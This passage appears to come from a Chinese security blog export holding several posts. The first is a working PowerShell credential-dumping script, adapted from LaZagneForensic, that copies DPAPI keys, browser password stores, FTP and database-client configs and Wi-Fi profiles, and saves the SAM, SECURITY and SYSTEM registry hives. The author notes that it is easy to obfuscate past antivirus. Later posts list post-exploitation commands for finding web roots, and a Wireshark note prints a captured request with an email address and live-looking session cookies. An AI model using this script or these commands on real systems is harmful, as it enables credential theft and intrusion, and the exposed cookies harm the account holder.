CreateDir($path){</div><div class="line"> If(!(Test-Path $path))</div><div class="line"> {</div><div class="line"> $new_dir = New-Item -ItemType Directory -Force -Path $path</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function SaveHives($hives_folder)</div><div class="line">{</div><div class="line"> CreateDir($hives_folder)</div><div class="line"> $dst = $hives_folder + '\SAM'</div><div class="line"> $sam = reg.exe save hklm\sam $dst </div><div class="line"> </div><div class="line"> $dst = $hives_folder + '\SECURITY'</div><div class="line"> $secu = reg.exe save hklm\security $dst </div><div class="line"> </div><div class="line"> $dst = $hives_folder + '\SYSTEM'</div><div class="line"> $sys = reg.exe save hklm\system $dst </div><div class="line">}</div><div class="line"></div><div class="line"></div><div class="line">function Dump</div><div class="line">{ </div><div class="line"><#</div><div class="line"> .PARAMETER Out</div><div class="line"> 指定所有文件将被复制的目录的名称(默认:转储)</div><div class="line"> </div><div class="line"> .EXAMPLE</div><div class="line"> PS C:\> Dump</div><div class="line"></div><div class="line"> .EXAMPLE</div><div class="line"> PS C:\> Dump -Out dump</div><div class="line">#></div><div class="line"> </div><div class="line"> Param(</div><div class="line"> [Parameter(Mandatory = $False)]</div><div class="line"> [String]</div><div class="line"> $Out = 'dump'</div><div class="line"> )</div><div class="line"></div><div class="line"> $usersFolder = $Out + '\Users'</div><div class="line"> $systemFolder = $Out + '\System'</div><div class="line"> $users = Get-ChildItem -Path C:\Users</div><div class="line"> </div><div class="line"> CreateDir($Out)</div><div class="line"> CreateDir($usersFolder)</div><div class="line"> CreateDir($systemFolder)</div><div class="line"></div><div class="line"> ######################################### 用户软件 #########################################</div><div class="line"></div><div 
class="line"> ##################### DPAPI ####################</div><div class="line"></div><div class="line"> $dpapi_roaming = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'subfolder' = 'Roaming'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Protect',</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Credentials',</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $dpapi_local = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'subfolder' = 'Local'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Local\Microsoft\Credentials',</div><div class="line"> 'C:\Users\[USER]\AppData\Local\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### 浏览器 ####################</div><div class="line"> </div><div class="line"> $firefox = @{</div><div class="line"> 'name' = 'Firefox'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Mozilla\Firefox\Profiles')</div><div class="line"> 'files' = @(</div><div class="line"> 'key4.db',</div><div class="line"> 'key3.db',</div><div class="line"> 'logins.json',</div><div class="line"> 'cert8.db'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $chrome = @{</div><div class="line"> 'name' = 'Chrome'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Local\Google\Chrome\User Data')</div><div class="line"> 'file' = 'Login Data'</div><div class="line"> }</div><div class="line"></div><div class="line"> $coccoc = @{</div><div class="line"> 'name' = 'Coccoc'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Local\CocCoc\Browser\User Data')</div><div class="line"> 'file' = 'Login Data'</div><div class="line"> 
}</div><div class="line"></div><div class="line"> $opera = @{</div><div class="line"> 'name' = 'Opera'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Opera Software\Opera Stable\Login Data')</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> ##################### 聊天软件 ####################</div><div class="line"></div><div class="line"> $pidgin = @{</div><div class="line"> 'name' = 'Pidgin'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\.purple\accounts.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### 数据库 #####################</div><div class="line"></div><div class="line"> $dbvis = @{</div><div class="line"> 'name' = 'Dbvis'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.dbvis\config70\dbvis.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $robomongo = @{</div><div class="line"> 'name' = 'Robomongo'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\.config\Robomongo\robomongo.json',</div><div class="line"> 'C:\Users\[USER]\.3T\robo-3t\1.1.1\robo3t.json'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $squirrel = @{</div><div class="line"> 'name' = 'Squirrel'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.squirrel-sql\SQLAliases23.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $sqlDeveloper = @{</div><div class="line"> 'name' = 'SQL Developer'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\SQL Developer')</div><div class="line"> 'files' = @(</div><div class="line"> 'product-preferences.xml',</div><div class="line"> 'connections.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> ##################### 邮件 #####################</div><div class="line"></div><div class="line"> 
$thunderbird = @{</div><div class="line"> 'name' = 'Thunderbird'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Thunderbird\Profiles')</div><div class="line"> 'files' = @(</div><div class="line"> 'key3.db',</div><div class="line"> 'logins.json',</div><div class="line"> 'cert8.db'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### SVN #####################</div><div class="line"></div><div class="line"> $tortoise = @{</div><div class="line"> 'name' = 'Tortoise'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Subversion\auth\svn.simple')</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### Sysadmin #####################</div><div class="line"></div><div class="line"> $apacheDirectoryStudio = @{</div><div class="line"> 'name' = 'ApacheDirectoryStudio'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $filezilla = @{</div><div class="line"> 'name' = 'Filezilla'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\sitemanager.xml', </div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\recentservers.xml', </div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\filezilla.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $ftpNavigator = @{</div><div class="line"> 'name' = 'FTP Navigator'</div><div class="line"> 'paths' = @('C:\FTP Navigator\Ftplist.txt')</div><div class="line"> }</div><div class="line"></div><div class="line"> </div><div class="line"> # 循环遍历所有用户</div><div class="line"> foreach ($user in $users.Name)</div><div class="line"> {</div><div class="line"> if ($user -ne "Public"){</div><div 
class="line"> $userFolder = $usersFolder + '\' + $user</div><div class="line"> CreateDir($userFolder)</div><div class="line"></div><div class="line"> # --- DPAPI ---</div><div class="line"> $dpapi_folder = $userFolder + '\' + $dpapi_roaming['name']</div><div class="line"> CreateDir($dpapi_folder)</div><div class="line"></div><div class="line"> $dpapi_roaming_folder = $dpapi_folder + '\' + $dpapi_roaming['subfolder'].replace('[USER]', $user)</div><div class="line"> CreateDir($dpapi_roaming_folder)</div><div class="line"> CheckFiles $dpapi_roaming_folder $user $dpapi_roaming</div><div class="line"></div><div class="line"> $dpapi_local_folder = $dpapi_folder + '\' + $dpapi_local['subfolder'].replace('[USER]', $user)</div><div class="line"> CreateDir($dpapi_local_folder)</div><div class="line"> CheckFiles $dpapi_local_folder $user $dpapi_local </div><div class="line"></div><div class="line"> # --- Browsers ---</div><div class="line"> ManageMozilla $userFolder $user $firefox</div><div class="line"> ManageChromeProfile $userFolder $user $chrome</div><div class="line"> ManageChromeProfile $userFolder $user $coccoc</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $opera['name']</div><div class="line"> CheckFiles $dst $user $opera</div><div class="line"></div><div class="line"> # --- Chats ---</div><div class="line"> $dst = $userFolder + '\' + $pidgin['name']</div><div class="line"> CheckFiles $dst $user $pidgin</div><div class="line"></div><div class="line"> # --- Databases ---</div><div class="line"> $dst = $userFolder + '\' + $dbvis['name']</div><div class="line"> CheckFiles $dst $user $dbvis</div><div class="line"> </div><div class="line"> $dst = $userFolder + '\' + $robomongo['name']</div><div class="line"> CheckFiles $dst $user $robomongo</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $squirrel['name']</div><div class="line"> CheckFiles $dst $user $squirrel</div><div class="line"></div><div class="line"> # Manage 
SQL Developer</div><div class="line"> foreach ($files in $sqlDeveloper['files'])</div><div class="line"> {</div><div class="line"> $paths = Get-ChildItem -Path $sqlDeveloper['paths'].replace('[USER]', $user) -Filter $files -Recurse -ErrorAction SilentlyContinue -Force</div><div class="line"> If ($paths -ne $null){</div><div class="line"> $sqldev_folder = $userFolder + '\' + $sqlDeveloper['name']</div><div class="line"> CreateDir($sqldev_folder)</div><div class="line"> foreach ($p in $paths.FullName)</div><div class="line"> {</div><div class="line"> CopyFile $p $sqldev_folder</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"> # --- Mail ---</div><div class="line"> ManageMozilla $userFolder $user $thunderbird</div><div class="line"></div><div class="line"> # --- Svn ---</div><div class="line"> $dst = $userFolder + '\' + $tortoise['name']</div><div class="line"> CheckFiles $dst $user $tortoise</div><div class="line"> </div><div class="line"> # --- Sysadmin ---</div><div class="line"> $dst = $userFolder + '\' + $apacheDirectoryStudio['name']</div><div class="line"> CheckFiles $dst $user $apacheDirectoryStudio</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $filezilla['name']</div><div class="line"> CheckFiles $dst $user $filezilla</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $ftpNavigator['name']</div><div class="line"> CheckFiles $dst $user $ftpNavigator</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"> ######################################### 系统密码 #########################################</div><div class="line"></div><div class="line"> ##################### DPAPI ####################</div><div class="line"></div><div class="line"> $dpapi_system = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'paths' = @(</div><div class="line"> 
'C:\Windows\System32\Microsoft\Protect',</div><div class="line"> 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $unattended = @{</div><div class="line"> 'name' = 'Unattended'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Windows\Panther\Unattend.xml', </div><div class="line"> 'C:\Windows\Panther\Unattended.xml',</div><div class="line"> 'C:\Windows\Panther\Unattend\Unattended.xml',</div><div class="line"> 'C:\Windows\Panther\Unattend\Unattend.xml',</div><div class="line"> 'C:\Windows\System32\Sysprep\unattend.xml',</div><div class="line"> 'C:\Windows\System32\Sysprep\Panther\unattend.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $wifi = @{</div><div class="line"> 'name' = 'Wifi'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> # --- DPAPI ---</div><div class="line"> $dst = $systemFolder + '\' + $dpapi_system['name']</div><div class="line"> CheckFiles $dst '' $dpapi_system</div><div class="line"></div><div class="line"> # --- Unattended ---</div><div class="line"> $dst = $systemFolder + '\' + $unattended['name']</div><div class="line"> CheckFiles $dst '' $unattended</div><div class="line"></div><div class="line"> # --- Wifi ---</div><div class="line"> $dst = $systemFolder + '\' + $wifi['name']</div><div class="line"> CheckFiles $dst '' $wifi</div><div class="line"></div><div class="line"> # saves system hives from registry</div><div class="line"> SaveHives($systemFolder + '\' + 'Hives')</div><div class="line"></div><div class="line"> "Folder " + $Out + " created successfully !"</div><div class="line">}</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>from <a href="https://github.com/AlessandroZ/LaZagneForensic" target="_blank" rel="external">https://github.com/AlessandroZ/LaZagneForensic</a></p>
<p>优点,免杀好做,python,powershell混淆一下就可以了<br>缺点,数据传输难免复杂,zip加密后倒是可以用用</p>
]]></content>
<tags>
<tag> system </tag>
</tags>
</entry>
<entry>
<title><![CDATA[txt to video]]></title>
<url>http://phpplay.github.io/2018/03/19/txt-to-video/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="powershell-code"><a href="#powershell-code" class="headerlink" title="powershell code"></a>powershell code</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$Sentence = "Who are you"</div><div class="line"> (new-object -com SAPI.SpVoice).speak("$Sentence")</div></pre></td></tr></table></figure>
<h2 id="c-code"><a href="#c-code" class="headerlink" title="c# code"></a>c# code</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">using System;</div><div class="line">using SpeechLib;</div><div class="line">using System.Windows.Forms;</div><div class="line"></div><div class="line">namespace WindowsFormsApplication1</div><div class="line">{ public partial class Form1 : Form</div><div class="line"> {</div><div class="line"> public Form1()</div><div class="line"> {</div><div class="line"> InitializeComponent();</div><div class="line"> }</div><div class="line"></div><div class="line"> private void button1_Click(object sender, EventArgs e)</div><div class="line"> {</div><div class="line"> SpVoice voice = new SpVoice();</div><div class="line"> voice.Speak(textBox1.Text);</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> c# </tag>
</tags>
</entry>
<entry>
<title><![CDATA[softlist]]></title>
<url>http://phpplay.github.io/2018/03/12/softlist/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="softlist"><a href="#softlist" class="headerlink" title="softlist"></a>softlist</h2><p>前段时间看到 @3gstudent 用来提取软件列表的<a href="https://github.com/3gstudent/ListInstalledPrograms" target="_blank" rel="external">powershell脚本</a>,于是就写了个c#版本的,bug不少,不过勉强够用,在x64上提取不全,过段时间再改进一下</p>
<h3 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div 
class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div></pre></td><td class="code"><pre><div class="line">using System;</div><div class="line">using System.Collections.Generic;</div><div class="line">using System.Text;</div><div class="line">using System.Management;</div><div class="line">using Microsoft;</div><div class="line">using Microsoft.Win32;</div><div class="line"></div><div class="line">namespace softlist</div><div class="line">{</div><div class="line"> class Program</div><div class="line"> {</div><div class="line"> private static string OSBit()</div><div class="line"> {</div><div class="line"> try</div><div class="line"> {</div><div class="line"> ConnectionOptions oConn = new ConnectionOptions();</div><div class="line"> System.Management.ManagementScope managementScope = new System.Management.ManagementScope("\\\\localhost", oConn);</div><div class="line"> System.Management.ObjectQuery objectQuery = 
new System.Management.ObjectQuery("select AddressWidth from Win32_Processor");</div><div class="line"> ManagementObjectSearcher moSearcher = new ManagementObjectSearcher(managementScope, objectQuery);</div><div class="line"> ManagementObjectCollection moReturnCollection = null;</div><div class="line"> string addressWidth = null;</div><div class="line"> moReturnCollection = moSearcher.Get();</div><div class="line"> foreach (ManagementObject oReturn in moReturnCollection)</div><div class="line"> {</div><div class="line"> addressWidth = oReturn["AddressWidth"].ToString();</div><div class="line"> }</div><div class="line"> return addressWidth;</div><div class="line"> }</div><div class="line"> catch</div><div class="line"> {</div><div class="line"> return "获取错误";</div><div class="line"> }</div><div class="line"> }</div><div class="line"> static void Main(string[] args)</div><div class="line"> {</div><div class="line"> //string a = softlist.Program.OSBit();</div><div class="line"> if (softlist.Program.OSBit() == "32")</div><div class="line"> {</div><div class="line"> using (RegistryKey key32 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", false))</div><div class="line"> {</div><div class="line"> if (key32 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key32.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key32.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation = key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r", softwareName, installLocation));</div><div 
class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> else</div><div class="line"> {</div><div class="line"></div><div class="line"> using (RegistryKey key64 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\", false))</div><div class="line"> {</div><div class="line"> if (key64 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key64.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key64.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation =key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r",softwareName, installLocation));</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> Console.WriteLine("\r\n--------------------------------------个分割线---------------------------------------\r\n");</div><div class="line"> using (RegistryKey key32 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\", false))</div><div class="line"> {</div><div class="line"> if (key32 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key32.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key32.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div 
class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation = key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r", softwareName, installLocation));</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> Console.ReadLine();</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> c# </tag>
</tags>
</entry>
<entry>
<title><![CDATA[where is web path]]></title>
<url>http://phpplay.github.io/2017/10/16/where-is-web-path/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="where-is-web-path-from-wooyun-zone"><a href="#where-is-web-path-from-wooyun-zone" class="headerlink" title="where is web path (from wooyun zone)"></a>where is web path (from wooyun zone)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">find / -name "*.php"</div><div class="line">find . -name "*.类型" | xargs grep "关键字"</div><div class="line">find / -name nginx.conf</div><div class="line">find / -name httpd.conf</div><div class="line">find robots.txt</div><div class="line">locate robots.txt</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">.bash_history</div><div class="line">httpd,nginx,tomcat,jboss的error_log</div><div class="line">/proc/self/cmdline</div><div class="line">/proc/self/maps</div><div class="line">web容器路径-->配置文件</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">win: findstr /s /i /n /d:C:\ "htmlString" *.*</div><div class="line">linux: find / -name "*.*" | xargs grep "htmlString"</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">cat /etc/nginx/conf/vhost/web.conf | grep root</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">echo "-----------------------start---------------------";find /etc -maxdepth 3 -name "*" 2>&1|xargs grep -s -i 'root /'| grep -s -i 'nginx\|apache';echo "-----------------------done----------------------"</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">For I in (curl http://localhost |grep -oP ([a-Z]{1-6})[\.js]));do for d in $(find / -name "*.js");do grep $i $d;done;done</div><div class="line">没实验,意思是打开首页匹配js文件,然后在系统内搜索所有js文件,按js文件名匹配</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">win:</div><div class="line">wmic datafile where "filename='123' and extension='avi'" get caption</div><div class="line"></div><div class="line">dir /s/a-d/b d:\*重复度较低的文件名(支持通配符)*</div><div class="line"></div><div class="line">where /r c: *.php</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">history | grep cd | grep -v grep | grep -E 'www|html|nginx|apache|php|lighttp|web' -i</div><div class="line"></div><div class="line">history | grep -E 'cd|vi|ed|nano|et|mkdir|rm|find|ls|mv' | grep -v grep | grep -E 'www|html|nginx|apache|php|lighttp|web' -i</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">1、netstat -anp | grep [port] --> PID</div><div class="line">2、ps -p [PID] -o cmd ww --> PID对应的启动命令(假设存在反向代理,则为bin目录)</div><div class="line">3、cd ../conf --> 寻找nginx.conf/httpd.conf</div><div class="line">4、通过反向代理ProxyPass/ProxyPassReverse找到对应的webapp端口号port2</div><div class="line">5、netstat -anp | grep [port2] --> PID2(web app的进程)</div><div class="line">6、ps -p [PID2] -o cmd ww --> PID2的“Catalina.base”</div><div class="line">7、cd 到“Catalina.base” --> server.xml</div><div class="line">8、从server.xml中找到appBase 和 docBase</div><div class="line">9、cd 到 $docBase/$appBase,即为当前web app路径。</div></pre></td></tr></table></figure>
]]></content>
<tags>
<tag> web </tag>
</tags>
</entry>
<entry>
<title><![CDATA[简单的Wireshark抓包]]></title>
<url>http://phpplay.github.io/2017/07/20/Wireshark/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="wireshark过滤规则"><a href="#wireshark过滤规则" class="headerlink" title="wireshark过滤规则"></a>wireshark过滤规则</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">常用的 直接在过滤规则输入 </div><div class="line"></div><div class="line">http </div><div class="line">tcp </div><div class="line">udp </div><div class="line">tcp.port == 80 || udp.port == 80</div><div class="line">ip.addr== 192.168.70.159</div><div class="line"></div><div class="line">http没有tcp.port == 80 || udp.port == 80效果好</div><div class="line">这些规则显示过滤器里面都有</div><div class="line"></div><div class="line">ip.后面有很多的选项</div><div class="line">可以用 || 来代表or</div><div class="line">&& 为 and 等等都很简单</div><div class="line">最简单的方法 就是找到一个想要的包,右键 把它设置为规则</div><div class="line">复杂一点的话,就去看帮助,学习过滤正则就好了</div><div class="line"></div><div class="line">PS:最好用中文版,看着省事</div></pre></td></tr></table></figure>
<h2 id="如何得到与burp一样的包结果"><a href="#如何得到与burp一样的包结果" class="headerlink" title="如何得到与burp一样的包结果"></a>如何得到与burp一样的包结果</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">抓到包后,右键选项里的复制选项>字节,就可以得到和burp一样的包结果了</div><div class="line">随意找了一个包</div><div class="line">结果如下</div><div class="line">Xil5EX@fKF{:ePPdqP</div><div class="line">GET /pushserver3/client?ClientVer=50800000001&GUID=PC9586697ac15763679&app=ydrive&cl=desktop&client_ver=50800000001&cto=600000&device_id=PC9586697ac15763679&device_name=WHOAMI&device_type=PC&did=PC9586697ac15763679&keyfrom=pc&lp=1500408903365&os=Windows&os_ver=Windows&pv=1&subvendor=&vendor=website&vendornew=website&ver=0 HTTP/1.1</div><div class="line">Accept: */*</div><div class="line">USER-ID: ccfuc2017@163.com</div><div class="line">User-Agent: Ydrive client</div><div class="line">Host: notify3.note.youdao.com</div><div class="line">Connection: Keep-Alive</div><div class="line">Cache-Control: no-cache</div><div class="line">Cookie: OUTFOX_SEARCH_USER_ID=1951253004@123.123.62.41; YNOTE_FORCE=true; YNOTE_SESS=v2|Y4KBDH-XfWTFh4wzOfYWRJ4kMQBhLOm0J4OMPLn4py0Q4nMOM64qL0Uf6MkfnfTFR64kfgBP4OMRTLPLkMRHwyR6KhfPFnfzGR; YNOTE_LOGIN=1||1500466436384; JSESSIONID=aaaEP4FnqI5rUhLR5z30v</div><div class="line"></div><div class="line">前面会有几个乱的字符,自己手工删掉就可以了</div></pre></td></tr></table></figure>
<h2 id="对包内容进行过滤,搜索"><a href="#对包内容进行过滤,搜索" class="headerlink" title="对包内容进行过滤,搜索"></a>对包内容进行过滤,搜索</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">可以使用规则 比如下面就是只抓get的包</div><div class="line">tcp.port == 80 || udp.port == 80 && http.request.method=="GET"</div><div class="line"></div><div class="line">也可以ctrl+f 直接找string 只要关键词选的好正确,很快就ok</div></pre></td></tr></table></figure>
<p>更多学习资料:<a href="http://jingyan.baidu.com/article/7f41ececede744593c095c79.html" target="_blank" rel="external">http://jingyan.baidu.com/article/7f41ececede744593c095c79.html</a></p>
